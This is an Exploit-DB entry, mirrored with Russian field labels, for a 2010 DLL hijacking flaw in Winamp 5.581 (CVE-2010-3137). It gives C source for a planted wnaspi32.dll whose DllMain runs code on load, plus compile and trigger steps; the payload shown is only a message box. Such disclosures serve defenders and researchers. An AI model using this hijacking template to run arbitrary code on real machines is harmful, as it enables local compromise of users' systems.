- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 14789
- Проверка EDB
-
- Пройдено
- Автор
- LIQUIDWORM
- Тип уязвимости
- LOCAL
- Платформа
- WINDOWS
- CVE
- cve-2010-3137
- Дата публикации
- 2010-08-25
C:
/*
Nullsoft Winamp 5.581 (wnaspi32.dll) DLL Hijacking Exploit
Vendor: Nullsoft.
Product Web Page: http://www.winamp.com
Affected Version: 5.581 (x86)
Summary: Winamp is a media player for Windows-based PCs,
written by Nullsoft, now a subsidiary of AOL. It is
proprietary freeware/shareware, multi-format, extensible
with plug-ins and skins, and is noted for its graphical
sound visualization, playlist, and media library features.
Desc: Winamp 5.581 suffers from a dll hijacking vulnerability
that enables the attacker to execute arbitrary code on a local
level. The vulnerable extensions are .669, .aac, .aiff, .amf,
.au, .avr, .b4s, .caf and .cda thru wnaspi32.dll and dwmapi.dll
libraries.
----
gcc -shared -o wnaspi32.dll winamp.c
Compile and rename to wnaspi32.dll, create a file test.cda and put both
files in same dir and execute.
----
Tested on Microsoft Windows XP Professional SP3 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.mk
25.08.2010
*/
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
dll_mll();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
int dll_mll()
{
MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}
- Источник
- www.exploit-db.com